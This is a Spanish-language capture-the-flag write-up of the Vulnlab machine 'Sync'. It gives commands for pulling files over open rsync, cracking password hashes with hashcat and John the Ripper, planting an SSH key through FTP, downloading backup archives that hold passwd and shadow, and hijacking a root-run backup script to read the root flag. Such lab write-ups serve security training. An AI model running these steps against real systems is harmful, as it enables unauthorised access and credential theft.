Sync - Writeup (Vulnlab)


NMAP
Arrancamos haciendo un rápido reconocimiento de puertos y servicios con NMAP, dando el siguiente resultado:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
873/tcp open rsync (protocol version 31)
Port 80/TCP
Revisando el puerto 80 no logro inyectar ni obtener nada relevante. Siguiendo con los demas puertos en el 21 de FTP directamente no acepta Anonymous user asi que me enfoco en el puerto de RSYNC el 873/tcp
873/TCP | ¿Que es el RSYNC?
RSync es una herramienta de sincronización versátil y ampliamente utilizada, especialmente en sistemas Linux y Unix-like. Es popular debido a su flexibilidad y capacidad para sincronizar archivos a través de redes. Viene pre-instalado en la mayoría de las distribuciones de Linux y su sintaxis es similar a otras herramientas como ssh, scp y cp.
Referencia util para pentesting rsync HackTricks: https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync
Podemos realizar algunas consultas desde la terminal para obtener algo de información al respecto:
nc 10.10.93.109 873 -vn
@RSYNCD: 31.0 <-------------- Le enviamos exactamente lo mismo que nos responde
No podemos hacer mucho ya que cierra la conexion, pero vamos a usar la aplicacion rsync para enumerar y obtener info mas detallada:
rsync -av --list-only rsync://10.10.93.109/httpd/
Ahora que podemos ver con más detalle, suena interesante el output. Vamos a probar lo siguiente:
rsync -av rsync://10.10.93.109/httpd/www/index.php .
De este modo me lo bajo a la carpeta actual donde estoy localmente.
Dentro podemos resaltar algunas cosas interesantes en principio el hash $secure:
Si bajamos la base de datos en db/site.db:
Vemos los usuarios admin y triss con sus respectivos hashes.
HASHCAT
Tiempo de crackear, y vamos a hacerlo con la información que tenemos.
Tenemos el Hash de la base de datos
Tenemos el Hash de $secure
Tenemos los nombre de usuarios
Si intento crackear el user de admin no obtengo respuesta. Sin embargo si tenemos éxito con TRISS. Lo primero es crear un archivo con todo el contenido y construirlo en el formato adecuado para hashcat. Seria algo asi:
<HASH_DB>:<HASH_SECURE>|<user>|
Sabiendo esto, procedemos a crackearlo con Hashcat:
hashcat -m 20 hash.txt ~/w0rd/rockyou.txt
USER TRISS
Si probamos las credenciales via web. No conseguimos mucho más que un portal con un CPU LOAD.
Si probamos via SSH:
Sera entonces FTP:
Efectivamente logueamos. Y al entrar de primera no veremos nada interesante a menos que:
ls -alh
ftp> ls -alh
227 Entering Passive Mode (10,10,93,109,186,233).
150 Here comes the directory listing.
drwxr-x---
drwxr-x---
2 1003
2 10031003
10034096 Apr 21 2023 .
4096 Apr 21 2023 ..
lrwxrwxrwx 1 0
-rw-r--r-- 1 10030
10039 Apr 21 2023 .bash_history - /dev/null
220 Apr 19 2023 .bash_logout
-rw-r--r--
-rw-r--r--1003
10033771 Apr 19 2023 .bashrc
807 Apr 19 2023 .profile
1 1003
1 1003
226 Directory send OK.
Luego de un rato de no encontrar nada interesante, pienso que al ser una estructura similar a la de un home-folder de linux, podría intentar crear un acceso vía SSH, para algo es que esta ese puerto accesible y además el “permission denied” anterior me da indicios..
SSH Access
La idea es generar unas keys de SSH mediante el comando ssh-keygen, y luego subirla via FTP, previamente, creo la carpeta .ssh/, finalmente, termino logueando, el comando para subir archivos desde FTP es PUT:
mkdir .ssh
cd .ssh/
put authorized_keys
Funciona y logueo correctamente vía SSH. Enumerando y deambulando por el host, tenemos un backup en el path: /backup. Procedemos a correr un python server y descargar todos los .zip.
triss@ip-10-10-200-238:/backup$ python3 -m http.server 8000
Desde nuestra maquina atacante hacemos:
wget -r http://10.10.93.109:8000/
Y finalmente descomprimimos todos los backup files:
unzip "*.zip"
Teniendo el archivo passwd y shadow podemos hacer lo siguiente para posteriormente crackearlo:
unshadow passwd shadow >crackme
Usando John The Ripper
Lo rompemos con el siguiente comando:
john --format=crypt crackme --wordlist=~/b0x/w0rd/rockyou.txt
Logueando como Jennifer (USER.txt)
Sacamos user.txt y luego:
su sa
SA user hacia ROOT
Esta parte es muy sencilla. Subiendo el linpeas, me indica que hay un archivo que podemos modificar porque somos propietarios y está ubicado en /usr/local/bin/backup.sh:
backup.sh
#!/bin/bash
mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
Podríamos generar una revshell, pero voy a hacerlo más fácil. Simplemente voy a catear la flag considerando que cuando esto se ejecute será con privilegios elevados. Al final del archivo backup.sh le agrego lo siguiente:
cat /root/root.txt >/tmp/flag.txt
Y finalmente, en breve obtendremos la flag.txt en /tmp/flag.txt.
Subscribe to my newsletter
Read articles from shkz directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

shkz
shkz
I am shkz, a Security Researcher, Red Team and CTF Player.